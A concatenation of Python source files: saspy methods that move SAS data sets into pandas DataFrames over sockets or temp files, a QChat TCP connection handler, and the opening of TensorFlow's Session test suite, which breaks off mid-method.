            code += "put '"+varlist[i]+"'n "
            if i != last:
                code += cdelim+'; '
            else:
                code += rdelim+'; '
            if i % 10 == 0:
                code +='\n'
        code += "run;"

    sock.listen(1)
    self._asubmit(code, 'text')

    r = []
    df = None
    datar = b''
    trows = kwargs.get('trows', None)
    if not trows:
        trows = 100000

    # If SAS never connects back (usually an error in the generated code),
    # bail out and return the log instead of hanging forever.
    if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
        print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
        sock.close()
        ll = self.submit("", 'text')
        return ll['LOG']

    newsock = (0,0)
    try:
        newsock = sock.accept()
        while True:
            data = newsock[0].recv(4096)

            if len(data):
                datar += data
            else:
                break

            # Keep any trailing partial row in datar for the next recv().
            data = datar.rpartition(rsep.encode())
            datap = data[0]+data[1]
            datar = data[2]

            datap = datap.decode(self.sascfg.encoding, errors='replace')
            for i in datap.split(sep=rsep):
                if i != '':
                    r.append(tuple(i.split(sep=csep)))

            # Periodically fold accumulated rows into the DataFrame to bound memory.
            if len(r) > trows:
                tdf = _typecast(pd.DataFrame.from_records(r, columns=varlist))
                if df is not None:
                    # pd.concat: DataFrame.append was removed in pandas 2.0
                    df = pd.concat([df, tdf], ignore_index=True)
                else:
                    df = tdf
                r = []
    except (KeyboardInterrupt, Exception) as e:
        print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
        try:
            if newsock[0]:
                newsock[0].shutdown(socks.SHUT_RDWR)
                newsock[0].close()
        except Exception:
            # BUG FIX: was 'except Exception as e:', which shadowed the outer
            # exception and unbound 'e' on exit, making the return below raise
            # NameError whenever this cleanup failed.
            pass
        sock.close()
        ll = self.submit("", 'text')
        return str(e)+"\n\n"+ll['LOG']

    newsock[0].shutdown(socks.SHUT_RDWR)
    newsock[0].close()
    sock.close()

    ll = self.submit("", 'text')

    # Fold in any remaining rows (or build an empty frame if nothing arrived).
    if len(r) > 0 or df is None:
        tdf = _typecast(pd.DataFrame.from_records(r, columns=varlist))
        if df is not None:
            df = pd.concat([df, tdf], ignore_index=True)
        else:
            df = tdf

    return df
def sasdata2dataframeCSV(self, table: str, libref: str ='', dsopts: dict = None, opts: dict = None,
                         tempfile: str=None, tempkeep: bool=False, port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
    """
    This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
    table    - the name of the SAS Data Set you want to export to a Pandas Data Frame
    libref   - the libref for the SAS Data Set.
    dsopts   - data set options for the input SAS Data Set
    opts     - a dictionary containing any of the following Proc Export options(delimiter, putnames)
    tempfile - file to use to store CSV, else temporary file will be used.
    tempkeep - if you specify your own file to use with tempfile=, this controls whether it's cleaned up after using it
    port     - port to use for socket. Defaults to 0 which uses a random available ephemeral port
    wait     - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout

    These two options are for advanced usage. They override how saspy imports data. For more info
    see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques

    dtype   - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
    my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
    """
    dsopts = dsopts if dsopts is not None else {}
    opts = opts if opts is not None else {}

    if port==0 and self.sascfg.tunnel:
        # we are using a tunnel; default to that port
        port = self.sascfg.tunnel

    if libref:
        tabname = libref+".'"+table.strip()+"'n "
    else:
        tabname = "'"+table.strip()+"'n "

    # CSV lands in a temp file unless the caller supplied one.
    tmpdir = None
    if tempfile is None:
        tmpdir = tf.TemporaryDirectory()
        tmpcsv = tmpdir.name+os.sep+"tomodsx"
    else:
        tmpcsv = tempfile

    # Probe the data set for record length, variable count, names and types.
    code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
    code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
    code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
    code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
    code += "put lr lrecl; put vn nvars; put vl;\n"
    code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
    code += "put vt;\n"
    code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
    code += "run;"

    ll = self.submit(code, "text")

    l2 = ll['LOG'].rpartition("LRECL= ")
    l2 = l2[2].partition("\n")
    lrecl = int(l2[0])

    l2 = l2[2].partition("VARNUMS= ")
    l2 = l2[2].partition("\n")
    nvars = int(l2[0])

    l2 = l2[2].partition("\n")
    varlist = l2[2].split("\n", nvars)
    del varlist[nvars]

    l2 = l2[2].partition("VARTYPE=")
    l2 = l2[2].partition("\n")
    vartype = l2[2].split("\n", nvars)
    del vartype[nvars]

    # Format categories, with row-subsetting options removed for the probe.
    topts = dict(dsopts)
    topts.pop('firstobs', None)
    topts.pop('obs', None)

    code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
    code += "data work._n_u_l_l_;output;run;\n"
    code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
    for i in range(nvars):
        code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
    code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"

    ll = self.submit(code, "text")

    l2 = ll['LOG'].rpartition("FMT_CATS=")
    l2 = l2[2].partition("\n")
    varcat = l2[2].split("\n", nvars)
    del varcat[nvars]

    if self.sascfg.ssh:
        # Remote SAS: stream the CSV back over a socket.
        try:
            sock = socks.socket()
            if self.sascfg.tunnel:
                sock.bind(('localhost', port))
            else:
                sock.bind(('', port))
            port = sock.getsockname()[1]
        except OSError:
            print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
            return None

        if not self.sascfg.tunnel:
            host = self.sascfg.hostip #socks.gethostname()
        else:
            host = 'localhost'
        code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v encoding='utf-8';\n"
    else:
        # Local SAS: write the CSV straight to the temp file.
        host = ''
        code = "filename sock '"+tmpcsv+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v encoding='utf-8';\n"

    code += "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";\nformat "

    idx_col = kwargs.pop('index_col', False)
    eng = kwargs.pop('engine', 'c')
    my_fmts = kwargs.pop('my_fmts', False)
    k_dts = kwargs.pop('dtype', None)
    if k_dts is None and my_fmts:
        print("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
        my_fmts = False

    # Unless the user opted out, force unambiguous ISO8601/best32. formats.
    if not my_fmts:
        for i in range(nvars):
            if vartype[i] == 'N':
                code += "'"+varlist[i]+"'n "
                if varcat[i] in self._sb.sas_date_fmts:
                    code += 'E8601DA10. '
                else:
                    if varcat[i] in self._sb.sas_time_fmts:
                        code += 'E8601TM15.6 '
                    else:
                        if varcat[i] in self._sb.sas_datetime_fmts:
                            code += 'E8601DT26.6 '
                        else:
                            code += 'best32. '
    code += ";\n run;\n"
    ll = self.submit(code, "text")

    # Build the read_csv dtype map unless the user supplied one.
    if k_dts is None:
        dts = {}
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    dts[varlist[i]] = 'float'
                else:
                    dts[varlist[i]] = 'str'
            else:
                dts[varlist[i]] = 'str'
    else:
        dts = k_dts

    code = "proc export data=work.sasdata2dataframe outfile=sock dbms=csv replace;\n"
    code += self._sb._expopts(opts)+" run;\n"
    code += "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"

    if self.sascfg.ssh:
        csv = open(tmpcsv, mode='wb')
        sock.listen(1)
        self._asubmit(code, 'text')

        # If SAS never connects back, return the log instead of hanging.
        if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
            print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
            sock.close()
            ll = self.submit("", 'text')
            return ll['LOG']

        newsock = (0,0)
        try:
            newsock = sock.accept()
            while True:
                data = newsock[0].recv(4096)
                if not len(data):
                    break
                csv.write(data)
        except (KeyboardInterrupt, Exception) as e:
            print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
            try:
                if newsock[0]:
                    newsock[0].shutdown(socks.SHUT_RDWR)
                    newsock[0].close()
            except Exception:
                # BUG FIX: was a bare 'except:'; narrowed so KeyboardInterrupt
                # and SystemExit aren't swallowed during cleanup.
                pass
            sock.close()
            ll = self.submit("", 'text')
            return str(e)+"\n\n"+ll['LOG']

        newsock[0].shutdown(socks.SHUT_RDWR)
        newsock[0].close()
        sock.close()

        ll = self.submit("", 'text')
        csv.close()

        df = pd.read_csv(tmpcsv, index_col=idx_col, engine=eng, dtype=dts, **kwargs)
    else:
        ll = self.submit(code, "text")
        try:
            df = pd.read_csv(tmpcsv, index_col=idx_col, engine=eng, dtype=dts, **kwargs)
        except FileNotFoundError:
            # SAS never produced the file — an error occurred in the step.
            print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
            if tmpdir:
                tmpdir.cleanup()
            return ll['LOG']

    if tmpdir:
        tmpdir.cleanup()
    else:
        if not tempkeep:
            os.remove(tmpcsv)

    if k_dts is None:  # don't override these if user provided their own dtypes
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    df[varlist[i]] = pd.to_datetime(df[varlist[i]], errors='coerce')

    return df
def sasdata2dataframeDISK(self, table: str, libref: str ='', dsopts: dict = None,
                          rowsep: str = '\x01', colsep: str = '\x02',
                          rowrep: str = ' ', colrep: str = ' ', tempfile: str=None,
                          tempkeep: bool=False, port: int=0, wait: int=10, **kwargs) -> '<Pandas Data Frame object>':
    """
    This method exports the SAS Data Set to a Pandas Data Frame, returning the Data Frame object.
    table    - the name of the SAS Data Set you want to export to a Pandas Data Frame
    libref   - the libref for the SAS Data Set.
    dsopts   - data set options for the input SAS Data Set
    rowsep   - the row seperator character to use; defaults to '\x01'
    colsep   - the column seperator character to use; defaults to '\x02'
    rowrep   - the char to convert to for any embedded rowsep chars, defaults to ' '
    colrep   - the char to convert to for any embedded colsep chars, defaults to ' '
    tempfile - file to use to store CSV, else temporary file will be used.
    tempkeep - if you specify your own file to use with tempfile=, this controls whether it's cleaned up after using it
    port     - port to use for socket. Defaults to 0 which uses a random available ephemeral port
    wait     - seconds to wait for socket connection from SAS; catches hang if an error in SAS. 0 = no timeout

    These two options are for advanced usage. They override how saspy imports data. For more info
    see https://sassoftware.github.io/saspy/advanced-topics.html#advanced-sd2df-and-df2sd-techniques

    dtype   - this is the parameter to Pandas read_csv, overriding what saspy generates and uses
    my_fmts - bool: if True, overrides the formats saspy would use, using those on the data set or in dsopts=
    """
    dsopts = dsopts if dsopts is not None else {}

    if port==0 and self.sascfg.tunnel:
        # we are using a tunnel; default to that port
        port = self.sascfg.tunnel

    if libref:
        tabname = libref+".'"+table.strip()+"'n "
    else:
        tabname = "'"+table.strip()+"'n "

    # Delimited data lands in a temp file unless the caller supplied one.
    tmpdir = None
    if tempfile is None:
        tmpdir = tf.TemporaryDirectory()
        tmpcsv = tmpdir.name+os.sep+"tomodsx"
    else:
        tmpcsv = tempfile

    # Probe the data set for record length, variable count, names and types.
    code = "data work.sasdata2dataframe / view=work.sasdata2dataframe; set "+tabname+self._sb._dsopts(dsopts)+";run;\n"
    code += "data _null_; file STDERR;d = open('work.sasdata2dataframe');\n"
    code += "lrecl = attrn(d, 'LRECL'); nvars = attrn(d, 'NVARS');\n"
    code += "lr='LRECL='; vn='VARNUMS='; vl='VARLIST='; vt='VARTYPE=';\n"
    code += "put lr lrecl; put vn nvars; put vl;\n"
    code += "do i = 1 to nvars; var = varname(d, i); put var; end;\n"
    code += "put vt;\n"
    code += "do i = 1 to nvars; var = vartype(d, i); put var; end;\n"
    code += "run;"

    ll = self.submit(code, "text")

    l2 = ll['LOG'].rpartition("LRECL= ")
    l2 = l2[2].partition("\n")
    lrecl = int(l2[0])

    l2 = l2[2].partition("VARNUMS= ")
    l2 = l2[2].partition("\n")
    nvars = int(l2[0])

    l2 = l2[2].partition("\n")
    varlist = l2[2].split("\n", nvars)
    del varlist[nvars]

    l2 = l2[2].partition("VARTYPE=")
    l2 = l2[2].partition("\n")
    vartype = l2[2].split("\n", nvars)
    del vartype[nvars]

    # Format categories, with row-subsetting options removed for the probe.
    topts = dict(dsopts)
    topts.pop('firstobs', None)
    topts.pop('obs', None)

    code = "proc delete data=work.sasdata2dataframe(memtype=view);run;\n"
    code += "data work._n_u_l_l_;output;run;\n"
    code += "data _null_; file STDERR; set work._n_u_l_l_ "+tabname+self._sb._dsopts(topts)+";put 'FMT_CATS=';\n"
    for i in range(nvars):
        code += "_tom = vformatn('"+varlist[i]+"'n);put _tom;\n"
    code += "stop;\nrun;\nproc delete data=work._n_u_l_l_;run;"

    ll = self.submit(code, "text")

    l2 = ll['LOG'].rpartition("FMT_CATS=")
    l2 = l2[2].partition("\n")
    varcat = l2[2].split("\n", nvars)
    del varcat[nvars]

    if self.sascfg.ssh or self._sb.m5dsbug:
        # Remote SAS (or the m5 data step bug workaround): stream via a socket.
        try:
            sock = socks.socket()
            if self.sascfg.tunnel:
                sock.bind(('localhost', port))
            else:
                sock.bind(('', port))
            port = sock.getsockname()[1]
        except OSError:
            print('Error try to open a socket in the sasdata2dataframe method. Call failed.')
            return None

        if not self.sascfg.tunnel:
            host = self.sascfg.hostip #socks.gethostname()
        else:
            host = 'localhost'

        enc = 'utf_8'
        if self._sb.m5dsbug:
            code = "filename sock socket '"+host+":"+str(port)+"' lrecl="+str(self.sascfg.lrecl)+" recfm=v termstr=LF;\n"
        else:
            code = "filename sock socket '"+host+":"+str(port)+"' recfm=S lrecl=4096;\n"
            #code = "filename sock socket '"+host+":"+str(port)+"' lrecl=1 recfm=F encoding=binary;\n"
    else:
        # Local SAS: write the delimited data straight to the temp file.
        host = ''
        enc = self.sascfg.encoding
        code = "filename sock '"+tmpcsv +"' lrecl=1 recfm=F encoding=binary;\n"

    # Hex literals for the row/column delimiters, for use in the SAS code.
    rdelim = "'"+'%02x' % ord(rowsep.encode(self.sascfg.encoding))+"'x"
    cdelim = "'"+'%02x' % ord(colsep.encode(self.sascfg.encoding))+"'x"

    idx_col = kwargs.pop('index_col', False)
    eng = kwargs.pop('engine', 'c')
    my_fmts = kwargs.pop('my_fmts', False)
    k_dts = kwargs.pop('dtype', None)
    if k_dts is None and my_fmts:
        print("my_fmts option only valid when dtype= is specified. Ignoring and using necessary formatting for data transfer.")
        my_fmts = False

    code += "data _null_; set "+tabname+self._sb._dsopts(dsopts)+";\n"

    # Unless the user opted out, force unambiguous ISO8601/best32. formats.
    if not my_fmts:
        for i in range(nvars):
            if vartype[i] == 'N':
                code += "format '"+varlist[i]+"'n "
                if varcat[i] in self._sb.sas_date_fmts:
                    code += 'E8601DA10.'
                else:
                    if varcat[i] in self._sb.sas_time_fmts:
                        code += 'E8601TM15.6'
                    else:
                        if varcat[i] in self._sb.sas_datetime_fmts:
                            code += 'E8601DT26.6'
                        else:
                            code += 'best32.'
                code += '; '
            if i % 10 == 0:
                code +='\n'

    if self._sb.m5dsbug:
        rsep = colsep+rowsep+'\n'
        csep = colsep

        code += "\nfile sock dlm="+cdelim+";\n"
        for i in range(nvars):
            if vartype[i] != 'N':
                # Scrub embedded delimiter chars out of character values.
                code += "'"+varlist[i]+"'n = translate('"
                code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
                    '%02x%02x' % \
                    (ord(rowrep.encode(self.sascfg.encoding)), \
                     ord(colrep.encode(self.sascfg.encoding))),
                    '%02x%02x' % \
                    (ord(rowsep.encode(self.sascfg.encoding)), \
                     ord(colsep.encode(self.sascfg.encoding))))
            if i % 10 == 0:
                code +='\n'

        code += "\nput "
        for i in range(nvars):
            code += " '"+varlist[i]+"'n "
            if i % 10 == 0:
                code +='\n'
        code += rdelim+";\nrun;"
    else:
        rsep = ' '+rowsep
        csep = ' '+colsep

        code += "\nfile sock;\n"
        for i in range(nvars):
            if vartype[i] != 'N':
                code += "'"+varlist[i]+"'n = translate('"
                code += varlist[i]+"'n, '{}'x, '{}'x); ".format( \
                    '%02x%02x' % \
                    (ord(rowrep.encode(self.sascfg.encoding)), \
                     ord(colrep.encode(self.sascfg.encoding))),
                    '%02x%02x' % \
                    (ord(rowsep.encode(self.sascfg.encoding)), \
                     ord(colsep.encode(self.sascfg.encoding))))
            if i % 10 == 0:
                code +='\n'

        code += "\n"
        last = len(varlist)-1
        for i in range(nvars):
            code += "put '"+varlist[i]+"'n "
            if i != last:
                code += cdelim+'; '
            else:
                code += rdelim+'; '
            if i % 10 == 0:
                code +='\n'
        code += "run;"

    if self.sascfg.ssh or self._sb.m5dsbug:
        csv = open(tmpcsv, mode='w', encoding=enc)
        sock.listen(1)
        self._asubmit(code, 'text')

        # If SAS never connects back, return the log instead of hanging.
        if wait > 0 and sel.select([sock],[],[],wait)[0] == []:
            print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
            sock.close()
            ll = self.submit("", 'text')
            return ll['LOG']

        datar = b""
        newsock = (0,0)
        try:
            newsock = sock.accept()
            while True:
                data = newsock[0].recv(4096)

                if len(data):
                    datar += data
                else:
                    break

                # Keep any trailing partial row in datar for the next recv().
                data = datar.rpartition(rsep.encode())
                datap = data[0]+data[1]
                datar = data[2]

                csv.write(datap.decode(self.sascfg.encoding, errors='replace').replace(rsep,rowsep))
        except (KeyboardInterrupt, Exception) as e:
            print("sasdata2dataframe was interupted. Trying to return the saslog instead of a data frame.")
            try:
                if newsock[0]:
                    newsock[0].shutdown(socks.SHUT_RDWR)
                    newsock[0].close()
            except Exception:
                # BUG FIX: was a bare 'except:'; narrowed so KeyboardInterrupt
                # and SystemExit aren't swallowed during cleanup.
                pass
            sock.close()
            ll = self.submit("", 'text')
            return str(e)+"\n\n"+ll['LOG']

        newsock[0].shutdown(socks.SHUT_RDWR)
        newsock[0].close()
        sock.close()

        ll = self.submit("", 'text')
        csv.close()
    else:
        ll = self.submit(code, "text")

    # Build the read_csv dtype map unless the user supplied one.
    if k_dts is None:
        dts = {}
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] not in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    dts[varlist[i]] = 'float'
                else:
                    dts[varlist[i]] = 'str'
            else:
                dts[varlist[i]] = 'str'
    else:
        dts = k_dts

    miss = ['.', ' ', '. ']
    quoting = kwargs.pop('quoting', 3)

    try:
        df = pd.read_csv(tmpcsv, index_col=idx_col, engine=eng, header=None, names=varlist,
                         sep=colsep, lineterminator=rowsep, dtype=dts, na_values=miss,
                         encoding=enc, quoting=quoting, **kwargs)
    except FileNotFoundError:
        # SAS never produced the file — an error occurred in the step.
        print("error occured in SAS during sasdata2dataframe. Trying to return the saslog instead of a data frame.")
        if tmpdir:
            tmpdir.cleanup()
        return ll['LOG']

    if tmpdir:
        tmpdir.cleanup()
    else:
        if not tempkeep:
            os.remove(tmpcsv)

    if k_dts is None:  # don't override these if user provided their own dtypes
        for i in range(nvars):
            if vartype[i] == 'N':
                if varcat[i] in self._sb.sas_date_fmts + self._sb.sas_time_fmts + self._sb.sas_datetime_fmts:
                    df[varlist[i]] = pd.to_datetime(df[varlist[i]], errors='coerce')

    return df
|
connection.py | import socket
import threading
from QChat.log import QChatLogger
from QChat.messages import HEADER_LENGTH, PAYLOAD_SIZE, MAX_SENDER_LENGTH, MessageFactory
from SimulaQron.cqc.pythonLib.cqc import *
class ConnectionError(Exception):
    """Raised when an incoming QChat message violates the expected wire format.

    NOTE(review): this shadows Python's builtin ConnectionError, so any caller
    catching the builtin will also catch this one — consider renaming.
    """
    pass
class DaemonThread(threading.Thread):
    """
    Thread class that defaults to running the thread with a daemon so that the thread can exit
    properly.

    The thread is started immediately on construction.
    """
    def __init__(self, target, args=(), kwargs=None):
        """
        :param target: Callable the thread runs
        :param args:   Optional positional arguments for target (generalizes the
                       original target-only interface; backward compatible)
        :param kwargs: Optional keyword arguments for target
        """
        super().__init__(target=target, args=args,
                         kwargs=kwargs if kwargs is not None else {}, daemon=True)
        self.start()
class QChatConnection:
    """Holds a host's CQC connection plus a classical TCP listener.

    Incoming QChat messages are validated for wire format and buffered in a
    lock-protected queue that consumers drain via recv_message().
    """
    def __init__(self, name, config):
        """
        Initialize a connection to the CQC server and
        :param name: Name of the host (Must be one available by SimulaQron CQC)
        :param config: Configuration for the connection
        """
        # Lock on the connection (guards the inbound message queue)
        self.lock = threading.Lock()

        # Logger
        self.logger = QChatLogger(__name__)

        # CQC and listening socket
        self.cqc = None
        self.listening_socket = None
        self.cqc = CQCConnection(name)

        # Host name the connection belongs to
        self.name = name

        # Listening configuration
        self.host = config['host']
        self.port = config['port']

        # Inbound message queue
        self.message_queue = []

        # Daemon threads
        self.listening_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        self.classical_thread = DaemonThread(target=self.listen_for_classical)

    def __del__(self):
        # Best-effort cleanup of the CQC and TCP resources.
        if self.cqc:
            self.cqc.close()
        if self.listening_socket:
            self.listening_socket.close()

    def get_connection_info(self):
        """Return a dict describing the classical listening endpoint."""
        info = {
            "connection": {
                "host": self.host,
                "port": self.port
            }
        }
        return info

    def listen_for_classical(self):
        """
        A daemon for handling incoming connections.
        :return: None
        """
        self.listening_socket.bind((self.host, self.port))
        while True:
            self.logger.debug("Listening for incoming connection")
            self.listening_socket.listen(1)
            conn, addr = self.listening_socket.accept()
            self.logger.debug("Got connection from {}".format(addr))
            self.start_handler(conn, addr)

    def start_handler(self, conn, addr):
        """
        Simple connection handler that passes work to thread
        :param conn: Connection information from socket
        :param addr: Address information from socket
        :return: None
        """
        t = threading.Thread(target=self._handle_connection, args=(conn, addr))
        t.start()

    def _handle_connection(self, conn, addr):
        """
        Receives incoming QChat Messages and verifies their structure before storing them
        so that they can be retrieved.
        :param conn: Connection information from sockets
        :param addr: Address information from sockets
        :return: None
        """
        # Verify the header structure
        header = conn.recv(HEADER_LENGTH)
        if header not in MessageFactory().message_mapping.keys():
            raise ConnectionError("Incorrect message header")

        # Verify the sender structure
        padded_sender = conn.recv(MAX_SENDER_LENGTH)
        if len(padded_sender) != MAX_SENDER_LENGTH:
            raise ConnectionError("Incorrect sender length")

        # Verify the sender info (strip the zero padding)
        sender = str(padded_sender.replace(b'\x00', b''), 'utf-8')
        if len(sender) == 0:
            raise ConnectionError("Invalid sender")

        # Get the message size
        size = conn.recv(PAYLOAD_SIZE)
        if len(size) != PAYLOAD_SIZE:
            raise ConnectionError("Incorrect payload size")

        # Retrieve the message data
        data_length = int.from_bytes(size, 'big')
        message_data = b''
        while len(message_data) < data_length:
            data = conn.recv(1024)
            if not data:
                raise ConnectionError("Message data too short")
            message_data += data

        # Verify the length of the sent data (any extra byte means overrun)
        if len(message_data) > data_length or conn.recv(1):
            raise ConnectionError("Message data too long")

        # Pass the message up
        self.logger.debug("Inserting message into queue")
        m = MessageFactory().create_message(header, sender, message_data)
        self._append_message_to_queue(m)
        conn.close()

    def _append_message_to_queue(self, message):
        # Thread-safe append used by the per-connection handler threads.
        with self.lock:
            self.message_queue.append(message)

    def _pop_message_from_queue(self):
        # Thread-safe pop of the oldest message; raises IndexError if empty.
        with self.lock:
            return self.message_queue.pop(0)

    def recv_message(self):
        """
        Return the oldest message in the queue, or None when it is empty.
        """
        # BUG FIX: the empty-check and the pop must happen under the same lock
        # acquisition. The old check-then-pop allowed a concurrent consumer to
        # drain the queue in between, raising IndexError.
        with self.lock:
            if self.message_queue:
                return self.message_queue.pop(0)
            return None

    def send_message(self, host, port, message):
        """
        Connects and sends a message to the specified host:port
        :param host: Hostname to send to
        :param port: Port to send to
        :param message: Bytes object message
        :return: None
        """
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((host, port))
        s.sendall(message)
        s.close()
        self.logger.debug("Sent message to {}:{}".format(host, port))
|
session_test.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for tensorflow.python.client.session.Session."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import threading
import time
import numpy as np
import six
from six.moves import xrange # pylint: disable=redefined-builtin
from tensorflow.core.lib.core import error_codes_pb2
from tensorflow.core.protobuf import config_pb2
from tensorflow.python.client import session
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import tensor_util
from tensorflow.python.framework import test_util
from tensorflow.python.framework import versions
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variables
from tensorflow.python.platform import googletest
from tensorflow.python.util import compat
# NOTE(mrry): Dummy shape registration for op used in the tests.
# (Registers None as the shape function for the test-only
# 'ConstructionFails' op at module import time.)
ops.RegisterShape('ConstructionFails')(None)
class SessionTest(test_util.TensorFlowTestCase):
  """Tests for tf.Session: graph handling, fetches, feeds, and lifecycle."""

  def testUseExistingGraph(self):
    """A Session constructed with an explicit graph evaluates ops from it."""
    with ops.Graph().as_default() as g, ops.device('/cpu:0'):
      a = constant_op.constant(6.0, shape=[1, 1])
      b = constant_op.constant(7.0, shape=[1, 1])
      c = math_ops.matmul(a, b, name='matmul')
    with session.Session(graph=g):
      result = c.eval()
      self.assertAllEqual(result, [[42.0]])
  def testUseDefaultGraph(self):
    """A Session constructed without a graph uses the default graph."""
    with ops.Graph().as_default(), ops.device('/cpu:0'):
      a = constant_op.constant(6.0, shape=[1, 1])
      b = constant_op.constant(7.0, shape=[1, 1])
      c = math_ops.matmul(a, b, name='matmul')
      with session.Session():
        result = c.eval()
        self.assertAllEqual(result, [[42.0]])
  def testCreate(self):
    """Evaluates an identity op both with and without a feed."""
    with session.Session():
      inp = constant_op.constant(10.0, shape=[2, 3], name='W1')
      copy = array_ops.identity(inp)
      # Test with feed.
      # TODO(mrry): Investigate why order='F' didn't work.
      arr = np.asarray([[0, 1, 2], [3, 4, 5]], dtype=np.float32, order='C')
      copy_val = copy.eval({'W1:0': arr})
      self.assertAllEqual(arr, copy_val)
      # Test without feed.
      copy_val = copy.eval()
      self.assertAllEqual(np.asarray([[10.0, 10.0, 10.0], [10.0, 10.0, 10.0]],
                                     dtype=np.float32), copy_val)
  def testManyCPUs(self):
    """A session configured with multiple CPU devices still evaluates ops."""
    # TODO(keveman): Implement ListDevices and test for the number of
    # devices returned by ListDevices.
    with session.Session(
        config=config_pb2.ConfigProto(device_count={'CPU': 2})):
      inp = constant_op.constant(10.0, name='W1')
      self.assertAllEqual(inp.eval(), 10.0)
  def testPerSessionThreads(self):
    """A session with use_per_session_threads=True still evaluates ops."""
    # TODO(keveman): Implement ListDevices and test for the number of
    # devices returned by ListDevices.
    with session.Session(
        config=config_pb2.ConfigProto(use_per_session_threads=True)):
      inp = constant_op.constant(10.0, name='W1')
      self.assertAllEqual(inp.eval(), 10.0)
  def testSessionInterOpThreadPool(self):
    """Sessions work with default-sized and single-thread inter-op pools."""
    config = config_pb2.ConfigProto()
    # First pool is left with its default (unspecified) number of threads.
    pool = config.session_inter_op_thread_pool.add()
    with session.Session(config=config) as s:
      inp = constant_op.constant(10.0, name='W1')
      results = s.run([inp])
      self.assertAllEqual([10.0], results)
    # Second pool is explicitly restricted to a single thread.
    pool = config.session_inter_op_thread_pool.add()
    pool.num_threads = 1
    with session.Session(config=config) as s:
      inp = constant_op.constant(20.0, name='W2')
      results = s.run([inp])
      self.assertAllEqual([20.0], results)
  def testErrorsReported(self):
    """Fetching a name that does not exist in the graph raises ValueError."""
    with session.Session() as s:
      constant_op.constant(10.0, name='W1')
      with self.assertRaises(ValueError):
        s.run('foo:0')
  def testErrorPayload(self):
    """An op error identifies the op that caused it (unfed placeholder)."""
    with session.Session():
      a = array_ops.placeholder(dtypes.float32)
      with self.assertRaisesOpError(lambda e: e.op == a.op):
        a.eval()
  def testErrorCodeWithNoNodeDef(self):
    """Errors not tied to a node (bad partial_run handle) carry no NodeDef."""
    with session.Session() as s:
      a = array_ops.placeholder(dtypes.float32, shape=[])
      b = array_ops.placeholder(dtypes.float32, shape=[])
      r1 = math_ops.add(a, b)
      def exc_predicate(e):
        # The error should have no op/node_def attached and use the
        # INVALID_ARGUMENT status code.
        return (e.op is None and e.node_def is None and
                e.error_code == error_codes_pb2.INVALID_ARGUMENT)
      with self.assertRaisesOpError(exc_predicate):
        # Run with a bogus handle.
        s.partial_run('foo', r1, feed_dict={a: 1, b: 2})
  def testOpConstructionErrorPayload(self):
    """Running an op whose construction failed reports that op in the error."""
    with session.Session():
      # 'ConstructionFails' is registered at module level with no shape fn.
      failing_op = ops.get_default_graph().create_op(
          'ConstructionFails', [], [], name='f')
      def exc_predicate(e):
        return (e.op == failing_op
                and e.error_code == error_codes_pb2.INVALID_ARGUMENT)
      with self.assertRaisesOpError(exc_predicate):
        failing_op.run()
  def testErrorBasedOn(self):
